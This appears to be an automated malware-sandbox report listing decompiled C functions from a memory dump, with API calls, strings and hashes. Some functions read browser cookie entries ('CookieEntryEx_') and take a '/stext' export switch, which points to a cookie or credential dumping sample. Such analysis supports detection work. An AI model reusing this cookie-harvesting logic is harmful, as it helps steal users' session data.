Instruction Fuzzy Hash: 830121B12422105EEB5CAF39ED0776A66D4A748345F40C5BFF106DE1F4EBB985448B08

Uniqueness

Uniqueness Score: -1.00%

Function 0040D56B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E0040D56B(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;
				long _t17;

				_t25 = __esi;
				E0040E340(0x20000, __ecx);
				if(_a4 == 0) {
					_t17 = GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24); // executed
					return _t17;
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040DFD6();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}

0x0040d56b
0x0040d573
0x0040d57c
0x0040d5e0
0x0040d5e7
0x0040d57e
0x0040d580
0x0040d5be
0x0040d590
0x0040d590
0x0040d598
0x0040d599
0x0040d5a4
0x0040d5a9
0x0040d5aa
0x0040d5b2
0x0040d5bb
0x0040d5bb
0x0040d5cf
0x0040d5cf

APIs

wcschr.MSVCRT ref: 0040D585
_snwprintf.MSVCRT ref: 0040D5AA
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040D5C8
GetPrivateProfileStringW.KERNEL32 ref: 0040D5E0

Strings

"%s", xrefs: 0040D599

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$Write_snwprintfwcschr
String ID: "%s"
API String ID: 1343145685-3297466227
Opcode ID: 45fc58c28ada156cfd054f268333e9a0d59d786c8ed30cc34748915b681648c3
Instruction ID: 59b69a585cfc8d845437793ab3ce32260e68e2dddd06eaeef13322f749f2ab00
Opcode Fuzzy Hash: 45fc58c28ada156cfd054f268333e9a0d59d786c8ed30cc34748915b681648c3
Instruction Fuzzy Hash: 3101783290421ABBEF219F919C06FDA3B6AAF04318F048035BE05601A2D7798525DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE3D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27
libraryloadertimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CE3D(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x4136f4 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x4136f4 = 1;
						 *0x4136f8 = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x4136f8 == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}

0x0040ce47
0x0040ce4e
0x0040ce56
0x0040ce5e
0x0040ce6e
0x0040ce6e
0x0040ce56
0x0040ce7a
0x0040ce92
0x0040ce7c
0x0040ce8b
0x0040ce8e
0x0040ce8e

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,0040D004,?,?,?,?,?,?,?), ref: 0040CE4E
GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 0040CE68
GetProcessTimes.KERNELBASE(?,?,?,?,?,?,0040D004,?,?,?,?,?,?,?), ref: 0040CE8B

Strings

kernel32.dll, xrefs: 0040CE49
GetProcessTimes, xrefs: 0040CE58

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcProcessTimes
String ID: GetProcessTimes$kernel32.dll
API String ID: 1714573020-3385500049
Opcode ID: 7c29d18577e7c0631cc297a8390a3d95ad77c93ea76d0503e1a5782c5d7fe6cc
Instruction ID: 9062282254ac126051856908680c029023e6c569a8a6eaee544e1b96dd2f004d
Opcode Fuzzy Hash: 7c29d18577e7c0631cc297a8390a3d95ad77c93ea76d0503e1a5782c5d7fe6cc
Instruction Fuzzy Hash: E7F03031141209FFDF218FA0ED45F963BA8AB14301F008176F92CA1AB0D77585A4DB9C

Uniqueness

Uniqueness Score: -1.00%

Function 004076F4, Relevance: 7.6, APIs: 5, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004076F4(intOrPtr* __edi) {
				void* __esi;
				void** _t11;
				intOrPtr* _t18;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr* _t36;

				_t27 = __edi;
				 *__edi = 0x410168;
				E0040768E(__edi);
				_t31 =  *((intOrPtr*)(__edi + 0x14));
				if(_t31 != 0) {
					E00406355(_t31);
					_push(_t31);
					L0040E032();
				}
				_t32 =  *((intOrPtr*)(_t27 + 0x10));
				if(_t32 != 0) {
					E00406355(_t32);
					_push(_t32);
					L0040E032();
				}
				_t33 =  *((intOrPtr*)(_t27 + 0xc));
				if(_t33 != 0) {
					E00406355(_t33);
					_push(_t33);
					L0040E032();
				}
				_t34 =  *((intOrPtr*)(_t27 + 8));
				if(_t34 != 0) {
					E00406355(_t34);
					_push(_t34);
					L0040E032();
				}
				_t18 = _t27;
				_pop(_t35);
				_push(_t27);
				_t36 = _t18;
				_t28 = 0;
				if( *((intOrPtr*)(_t36 + 4)) > 0 &&  *((intOrPtr*)(_t36 + 0x3c)) > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E00407588(_t36, _t28))) + 0xc))();
						_t28 = _t28 + 1;
					} while (_t28 <  *((intOrPtr*)(_t36 + 0x3c)));
				}
				_t11 =  *((intOrPtr*)( *_t36))();
				free( *_t11); // executed
				return _t11;
			}

0x004076f4
0x004076f7
0x004076fd
0x00407702
0x00407707
0x00407709
0x0040770e
0x0040770f
0x00407714
0x00407715
0x0040771a
0x0040771c
0x00407721
0x00407722
0x00407727
0x00407728
0x0040772d
0x0040772f
0x00407734
0x00407735
0x0040773a
0x0040773b
0x00407740
0x00407742
0x00407747
0x00407748
0x0040774d
0x0040774e
0x00407750
0x00407757
0x00407758
0x0040775a
0x0040775f
0x00407766
0x00407770
0x00407773
0x00407774
0x00407766
0x0040777d
0x00407781
0x00407789

APIs

Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 0040769A
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076A8
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076B9
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D0
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D9

??3@YAXPAX@Z.MSVCRT ref: 0040770F
??3@YAXPAX@Z.MSVCRT ref: 00407722
??3@YAXPAX@Z.MSVCRT ref: 00407735
??3@YAXPAX@Z.MSVCRT ref: 00407748
free.MSVCRT(00000000), ref: 00407781

Part of subcall function 00406355: free.MSVCRT(00000000,004065BB,74784E00,?,00000000), ref: 0040635C

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$free
String ID:
API String ID: 2241099983-0
Opcode ID: fed31934c8ca2d006947c88f4fde5997effb1b6458a607f602b4779a4b9fefa7
Instruction ID: c8a6b3cb51e6e8f56dec58333c0ea0519a89c45fbe64381fe3d5b910dcd78a78
Opcode Fuzzy Hash: fed31934c8ca2d006947c88f4fde5997effb1b6458a607f602b4779a4b9fefa7
Instruction Fuzzy Hash: 9901C232E099305BC6257B3AD40191EB3A9AE80BA0316453FE905B73D1CB7C7C518ADE

Uniqueness

Uniqueness Score: -1.00%

Function 00401DCF, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401DCF(void* __ecx, signed int _a4, signed short* _a8) {
				signed int _t23;
				signed short* _t24;
				void* _t27;
				signed short* _t32;

				_t23 = _a4;
				_t32 = _a8;
				 *_t32 =  *_t32 & 0x00000000;
				_t27 = 0xa;
				if(_t23 > _t27) {
					L12:
					_t24 = _t32;
					L13:
					return _t24;
				}
				switch( *((intOrPtr*)(_t23 * 4 +  &M00401E73))) {
					case 0:
						__eax = __ecx + 0x38;
						goto L15;
					case 1:
						__eax = __ecx + 0x30;
						L15:
						__eax = E00401D90(__eax, __esi); // executed
						goto L12;
					case 2:
						__ecx =  *((intOrPtr*)(__ecx + 0x10));
						goto L18;
					case 3:
						__ecx =  *((intOrPtr*)(__ecx + 0x14));
						goto L18;
					case 4:
						__ecx =  *((intOrPtr*)(__ecx + 0x18));
						goto L18;
					case 5:
						__ecx =  *((intOrPtr*)(__ecx + 0x1c));
						L18:
						__eax = 0x412320;
						goto L3;
					case 6:
						__eflags =  *(__ecx + 0x40) & 0x00000001;
						goto L6;
					case 7:
						__eflags =  *(__ecx + 0x40) & 0x00002000;
						goto L6;
					case 8:
						__eflags =  *(__ecx + 0x40) & 0x00004000;
						L6:
						if(__eflags == 0) {
							_push(9);
							_pop(__ebx);
						}
						__eax = E00406827(__ebx);
						goto L13;
					case 9:
						_push( *((intOrPtr*)(__ecx + 0x2c)));
						_push( *((intOrPtr*)(__ecx + 0x28)));
						_push(L"%I64d");
						_push(0xff);
						_push(__esi);
						L0040DFD6();
						__esp = __esp + 0x14;
						goto L12;
					case 0xa:
						_t30 =  *((intOrPtr*)(__ecx + 0x20));
						L3:
						_t24 = E00406306(0x412340, _t30);
						if(_t24 == 0) {
							_t24 = 0x40f454;
						}
						goto L13;
				}
			}

0x00401dd5
0x00401dda
0x00401ddd
0x00401de3
0x00401de6
0x00401e40
0x00401e40
0x00401e42
0x00401e47
0x00401e47
0x00401de8
0x00000000
0x00401e4a
0x00000000
0x00000000
0x00401e55
0x00401e4d
0x00401e4e
0x00000000
0x00000000
0x00401e5a
0x00000000
0x00000000
0x00401e64
0x00000000
0x00000000
0x00401e69
0x00000000
0x00000000
0x00401e6e
0x00401e5d
0x00401e5d
0x00000000
0x00000000
0x00401e07
0x00000000
0x00000000
0x00401e1f
0x00000000
0x00000000
0x00401e17
0x00401e0b
0x00401e0b
0x00401e0d
0x00401e0f
0x00401e0f
0x00401e10
0x00000000
0x00000000
0x00401e27
0x00401e2a
0x00401e2d
0x00401e32
0x00401e37
0x00401e38
0x00401e3d
0x00000000
0x00000000
0x00401def
0x00401df7
0x00401df7
0x00401dfe
0x00401e00
0x00401e00
0x00000000
0x00000000

APIs

_snwprintf.MSVCRT ref: 00401E38

Strings

%I64d, xrefs: 00401E2D
#A, xrefs: 00401E5D
@#A, xrefs: 00401DF2

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf
String ID: #A$%I64d$@#A
API String ID: 3988819677-2754857024
Opcode ID: 39a1b14ef70dc346d1b612ee092b96a4144a5099e147f5cc33a0ca018d1c3096
Instruction ID: 57e1b299ab2ee78cab24039c69e456b61a4fcaae797c094412e686c8a915beca
Opcode Fuzzy Hash: 39a1b14ef70dc346d1b612ee092b96a4144a5099e147f5cc33a0ca018d1c3096
Instruction Fuzzy Hash: A811BF31204204D7D724AA54D841AA97369BB01358B3004BFFE16AE2E2D77AD953D3CE

Uniqueness

Uniqueness Score: -1.00%

Function 0040562D, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040562D(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x40655f
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}

0x0040562d
0x0040562e
0x00405632
0x0040567d
0x00405634
0x00405635
0x00405637
0x00405637
0x0040563b
0x0040563d
0x0040563f
0x00405649
0x00405651
0x00405653
0x00405657
0x00405661
0x00405666
0x0040566a
0x0040566f
0x00405679
0x00405679

APIs

malloc.MSVCRT ref: 00405649
memcpy.MSVCRT ref: 00405661
free.MSVCRT(00000000,00000000,?,00406343,00000002,?,00000000,?,0040655F,74784E00,?,00000000), ref: 0040566A

Strings

_e@, xrefs: 00405637

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: freemallocmemcpy
String ID: _e@
API String ID: 3056473165-4143410925
Opcode ID: 3078e6390c3b9a2d3984cf8c16c15fdfdd782231e9a83da3d75a0699d865d50d
Instruction ID: 65c1df984c8dd591618957182971b53504cae5b365517194d008c843f4823b23
Opcode Fuzzy Hash: 3078e6390c3b9a2d3984cf8c16c15fdfdd782231e9a83da3d75a0699d865d50d
Instruction Fuzzy Hash: 78F0E2B26052229FC718AB76B98184BB3ADEF443247504C3FF408E3281D7399C50CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004061CD, Relevance: 6.0, APIs: 4, Instructions: 34
timeCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004061CD(FILETIME* __edi, signed int* __esi) {
				struct _SYSTEMTIME _v20;
				struct _SYSTEMTIME _v36;
				int _t12;

				if(__edi->dwHighDateTime != 0) {
					FileTimeToSystemTime(__edi,  &_v20);
					_t12 = SystemTimeToTzSpecificLocalTime(0,  &_v20,  &_v36); // executed
					_push(__esi);
					if(_t12 == 0) {
						return FileTimeToLocalFileTime(__edi, ??);
					} else {
						SystemTimeToFileTime( &_v36, ??);
						return 1;
					}
				} else {
					 *__esi =  *__esi & 0x00000000;
					__esi[1] = __esi[1] & 0x00000000;
					return 0;
				}
			}

0x004061d7
0x004061e9
0x004061f9
0x00406201
0x00406202
0x0040621b
0x00406204
0x00406208
0x00406212
0x00406212
0x004061d9
0x004061d9
0x004061dc
0x004061e3
0x004061e3

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,00401DAD), ref: 004061E9
SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,00401DAD), ref: 004061F9
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00401DAD), ref: 00406208

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$System$File$LocalSpecific
String ID:
API String ID: 979780441-0
Opcode ID: 7151ffe715f6e20ab243f245306c6cfdc10268265a47bf40f88944b89cde35d5
Instruction ID: ac9071ec82a3ebeda66c59c5f140a76e8f402871b7042997bc81315e07851fa8
Opcode Fuzzy Hash: 7151ffe715f6e20ab243f245306c6cfdc10268265a47bf40f88944b89cde35d5
Instruction Fuzzy Hash: 86F05E729101099BDB209BA0DD49BBBB3FCFB4470AF04443AE502E2080EB74D4088BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD40, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040BD40(void* __eax, void* __edx, void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				void* __edi;
				void* __esi;
				signed int _t33;
				intOrPtr _t34;
				signed int _t43;
				intOrPtr _t54;
				intOrPtr* _t55;
				void* _t60;
				void* _t61;
				signed int _t65;
				intOrPtr _t66;
				void* _t71;

				_t60 = __edx;
				_t54 = 0;
				_t61 = __eax;
				_v4 = 0;
				E00401EA3( *((intOrPtr*)(__eax + 0x69c)), __eflags, 0, 0);
				 *((intOrPtr*)(_t61 + 0x208)) = 0;
				_t71 = 0;
				_v16 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30)) - 1 <= 0) {
					L18:
					return _v4;
				} else {
					goto L1;
				}
				do {
					L1:
					_t33 =  *((intOrPtr*)(_t61 + 0x6c0));
					if(_t54 >=  *((intOrPtr*)(_t33 + 0x30))) {
						_t65 = 0x40f454;
					} else {
						_t33 = E00406306(_t33, _t54);
						_t65 = _t33;
					}
					_push(_t65);
					_push(L"/stext");
					L0040E03E();
					_pop(_t57);
					if(_t33 != 0) {
						_t34 = E0040BCAA(_t33, _t65);
						__eflags = _t34;
						if(_t34 <= 0) {
							goto L8;
						}
						goto L7;
					} else {
						_t34 = _t33 + 1;
						L7:
						_v8 = _t34;
						_t10 = _t54 + 1; // 0x2
						_t71 = _t10;
					}
					L8:
					_t54 = _t54 + 1;
				} while (_t54 <  *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30)) - 1);
				_t66 = _v8;
				if(_t66 > 0) {
					E0040B147(_t61, _t57, 0); // executed
					E0040A4C2(_t61);
					_t42 =  *((intOrPtr*)(_t61 + 0x6c0));
					if(_t71 >=  *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30))) {
						_t43 = 0x40f454;
					} else {
						_t57 = _t71;
						_t43 = E00406306(_t42, _t71);
					}
					_t79 = _t66 - 8;
					if(_t66 != 8) {
						E004096FE( *((intOrPtr*)(_t61 + 0x69c)), _t60, __eflags, _t43, _t66); // executed
					} else {
						E0040ACA7(_t61, _t57, _t60, _t79, _t43, 0);
					}
					_t55 =  *((intOrPtr*)(_t61 + 0x69c));
					_v4 = 1;
					if(_t55 != 0) {
						 *_t55 = 0x40f648;
						 *((intOrPtr*)(_t55 + 0x34c)) = 0x40f6e0;
						E00403F55(_t55 + 0xbf0);
						E0040623E(_t55 + 0xbd0);
						E0040623E(_t55 + 0xbac);
						E00406355(_t55 + 0xb98);
						 *((intOrPtr*)(_t55 + 0x34c)) = 0x40f948;
						E00403FBE(_t55 + 0x350);
						E004076F4(_t55);
						_push(_t55);
						L0040E032();
					}
				}
				goto L18;
			}

0x0040bd40
0x0040bd47
0x0040bd49
0x0040bd53
0x0040bd57
0x0040bd62
0x0040bd6b
0x0040bd70
0x0040bd74
0x0040be8c
0x0040be97
0x00000000
0x00000000
0x00000000
0x0040bd7a
0x0040bd7a
0x0040bd7a
0x0040bd83
0x0040bd90
0x0040bd85
0x0040bd87
0x0040bd8c
0x0040bd8c
0x0040bd95
0x0040bd96
0x0040bd9b
0x0040bda3
0x0040bda4
0x0040bda9
0x0040bdae
0x0040bdb0
0x00000000
0x00000000
0x00000000
0x0040bda6
0x0040bda6
0x0040bdb2
0x0040bdb2
0x0040bdb6
0x0040bdb6
0x0040bdb6
0x0040bdb9
0x0040bdc2
0x0040bdc4
0x0040bdc8
0x0040bdce
0x0040bdd8
0x0040bddf
0x0040bde4
0x0040bded
0x0040bdf8
0x0040bdef
0x0040bdef
0x0040bdf1
0x0040bdf1
0x0040bdfd
0x0040be00
0x0040be16
0x0040be02
0x0040be07
0x0040be07
0x0040be1b
0x0040be23
0x0040be2b
0x0040be33
0x0040be39
0x0040be43
0x0040be4e
0x0040be59
0x0040be64
0x0040be6f
0x0040be79
0x0040be80
0x0040be85
0x0040be86
0x0040be8b
0x0040be2b
0x00000000

APIs

_wcsicmp.MSVCRT ref: 0040BD9B
??3@YAXPAX@Z.MSVCRT ref: 0040BE86

Part of subcall function 0040BCAA: _wcsicmp.MSVCRT ref: 0040BCB0

Strings

/stext, xrefs: 0040BD96

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsicmp$??3@
String ID: /stext
API String ID: 3682227554-3817206916
Opcode ID: b49fe5e3a00eb3dd06afc28d0350945e3807d706bde39c4344975c329a5855a1
Instruction ID: d8bbb9b930e80b6915cfb13594633440f620dbacd53bdbbf48f85004c8b902b2
Opcode Fuzzy Hash: b49fe5e3a00eb3dd06afc28d0350945e3807d706bde39c4344975c329a5855a1
Instruction Fuzzy Hash: CF31A6316002019BD710FE26D88169AB799FF40358F01057FFC09BB292CB7DA81987ED

Uniqueness

Uniqueness Score: -1.00%

Function 00403EAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
fileCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00403EAC(void* __ecx, void* __edx, void* __edi) {
				intOrPtr _v8;
				void* __esi;
				intOrPtr _t9;
				void* _t14;
				void* _t21;
				void* _t22;
				void* _t24;
				WCHAR* _t27;
				signed int _t28;
				signed int _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t29 = _t28 & 0xfffffff8;
				_push(__ecx);
				_push(__ecx);
				_t9 = E004039F6(__edi); // executed
				_t24 = 0;
				_v8 = _t9;
				if(_t9 != 0) {
					L7:
					return _v8;
				}
				if( *((intOrPtr*)(__edi + 0x42c)) <= 0) {
					L5:
					E0040405E(_t22 + 4);
					_t27 = _t22 + 0x430;
					if( *_t27 != 0) {
						DeleteFileW(_t27); // executed
						 *_t27 =  *_t27 & 0x00000000;
					}
					goto L7;
				} else {
					goto L2;
				}
				do {
					L2:
					_t14 = E00403F2B(_t24, _t22 + 0x420);
					_push(0xe);
					_t18 = _t14;
					_push(L"CookieEntryEx_");
					_push(_t14);
					L0040E044();
					_t29 = _t29 + 0xc;
					if(_t14 == 0) {
						E00403BAF(_t21, _t22, _t18); // executed
					}
					_t24 = _t24 + 1;
				} while (_t24 <  *((intOrPtr*)(_t22 + 0x42c)));
				goto L5;
			}

0x00403eac
0x00403eac
0x00403eaf
0x00403eb2
0x00403eb3
0x00403eb8
0x00403ebd
0x00403ec1
0x00403ec5
0x00403f21
0x00403f2a
0x00403f2a
0x00403ecd
0x00403f02
0x00403f05
0x00403f0a
0x00403f14
0x00403f17
0x00403f1d
0x00403f1d
0x00000000
0x00000000
0x00000000
0x00000000
0x00403ecf
0x00403ecf
0x00403ed7
0x00403edc
0x00403ede
0x00403ee0
0x00403ee5
0x00403ee6
0x00403eeb
0x00403ef0
0x00403ef4
0x00403ef4
0x00403ef9
0x00403efa
0x00000000

APIs

Part of subcall function 004039F6: memset.MSVCRT ref: 00403A36
Part of subcall function 004039F6: memset.MSVCRT ref: 00403A50
Part of subcall function 004039F6: wcslen.MSVCRT ref: 00403A68
Part of subcall function 004039F6: wcslen.MSVCRT ref: 00403A77

_wcsnicmp.MSVCRT ref: 00403EE6

Part of subcall function 00403BAF: memset.MSVCRT ref: 00403CCA

DeleteFileW.KERNELBASE(?), ref: 00403F17

Strings

CookieEntryEx_, xrefs: 00403EE0

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$wcslen$DeleteFile_wcsnicmp
String ID: CookieEntryEx_
API String ID: 3258848388-47494461
Opcode ID: 66636eece1735f668a1aae4ed6bccc9c4179c0fd9ab6a026f0bbd4c75a5b9373
Instruction ID: 4f7492928af6ede5aa7db47b88c775c9002a426620b820d7d458ceab620e9f9d
Opcode Fuzzy Hash: 66636eece1735f668a1aae4ed6bccc9c4179c0fd9ab6a026f0bbd4c75a5b9373
Instruction Fuzzy Hash: DF01DBF1A10512AAC2146F25CC426ABF7ACFB04705F00463AF954B31C2E7B86E5187DD

Uniqueness

Uniqueness Score: -1.00%

Function 0040567E, Relevance: 4.5, APIs: 3, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040567E(WCHAR* __edi, WCHAR* _a4) {
				short _v524;
				WCHAR* _t12;

				_t12 = __edi;
				if(GetTempPathW(0x104,  &_v524) == 0) {
					GetWindowsDirectoryW( &_v524, 0x104);
				}
				 *_t12 =  *_t12 & 0x00000000;
				GetTempFileNameW( &_v524, _a4, 0, _t12); // executed
				return _t12;
			}

0x0040567e
0x0040569d
0x004056a7
0x004056a7
0x004056ad
0x004056be
0x004056c8

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00405695
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004056A7
GetTempFileNameW.KERNELBASE(?,?,00000000,?), ref: 004056BE

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Temp$DirectoryFileNamePathWindows
String ID:
API String ID: 1125800050-0
Opcode ID: a6a92a3c40634cb4734888aa7d27f433ca36c8edd77e4dee02c29b005201ca48
Instruction ID: c75b1f9f3821b2d5fe4ff9c2abf5100b014bffad6fc652feb2669510f5e075a4
Opcode Fuzzy Hash: a6a92a3c40634cb4734888aa7d27f433ca36c8edd77e4dee02c29b005201ca48
Instruction Fuzzy Hash: E9E09276500319EBDB209B50DC0DFC7377CEB84304F000470B945F2151E634AA488BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00404070(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void* _t15;

				_t17 =  *(__esi[0x106] + 0xec);
				_t11 = _a8 + 1;
				_push(0);
				SetFilePointerEx( *__esi, (_a8 + 1) *  *(__esi[0x106] + 0xec), _t11 * _t17 >> 0x20, 0); // executed
				_t14 = E00405E43(_t15,  *__esi, _a4, _t17); // executed
				return _t14;
			}

0x00404077
0x00404081
0x00404084
0x0040408c
0x00404099
0x004040a2

APIs

SetFilePointerEx.KERNELBASE(F@@,?,?,00000000,00000000,00000000,004046C5,00000000,00000000,?,00000000,F@@), ref: 0040408C

Part of subcall function 00405E43: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A

Strings

F@@, xrefs: 0040408A, 00404097

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: File$PointerRead
String ID: F@@
API String ID: 3154509469-234039029
Opcode ID: 824bb1f14422cc71d1a3dffc559b1a5fb77c784d9cd166a2f2aef982484e0c7b
